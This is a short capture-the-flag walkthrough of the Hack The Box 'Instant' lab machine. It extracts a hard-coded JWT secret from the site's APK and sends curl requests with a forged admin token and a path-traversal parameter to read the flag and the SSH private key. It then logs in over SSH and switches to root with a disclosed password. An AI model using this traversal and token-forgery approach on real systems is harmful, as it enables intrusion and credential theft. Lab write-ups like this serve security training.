Instant HTB Writeup

Описание изображения

HTB machine link:

https://app.hackthebox.com/machines/Instant

Recon Link to heading

Описание изображения

Описание изображения

sudo echo "10.10.11.37 instant.htb" | sudo tee -a /etc/hosts

Описание изображения

Go to the website

Описание изображения

When you click on the ‘DOWNLOAD NOW’ button, the apk file is downloaded

wget http://instant.htb/downloads/instant.apk

Get JWT token from apk file. Secret key jwt -VeryStrongS3cretKeyY0uC4NTGET

Quick Solve Link to heading 

sudo echo "10.10.11.37 swagger-ui.instant.htb" | sudo tee -a /etc/hosts

User flag Link to heading 

curl -X GET "http://swagger-ui.instant.htb/api/v1/admin/read/log?log_file_name=..%2Fuser.txt" -H "accept: application/json" -H "Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MSwicm9sZSI6IkFkbWluIiwid2FsSWQiOiJmMGVjYTZlNS03ODNhLTQ3MWQtOWQ4Zi0wMTYyY2JjOTAwZGIiLCJleHAiOjMzMjU5MzAzNjU2fQ.v0qyyAqDSgyoNFHU7MgRQcDA0Bw99_8AEXKGtWZ6rYA"

Описание изображения

Root flag Link to heading

Get RSA Private key

curl -X GET "http://swagger-ui.instant.htb/api/v1/admin/read/log?log_file_name=..%2F.ssh%2Fid_rsa" -H  "accept: application/json" -H  "Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MSwicm9sZSI6IkFkbWluIiwid2FsSWQiOiJmMGVjYTZlNS03ODNhLTQ3MWQtOWQ4Zi0wMTYyY2JjOTAwZGIiLCJleHAiOjMzMjU5MzAzNjU2fQ.v0qyyAqDSgyoNFHU7MgRQcDA0Bw99_8AEXKGtWZ6rYA"

Copy RSA Private key to id_rsa

nano id_rsa

chmod 600 id_rsa

ssh -i id_rsa [email protected]

Описание изображения

su root

root password - 12**24nzC!r0c%q12

Описание изображения

cat /root/root.txt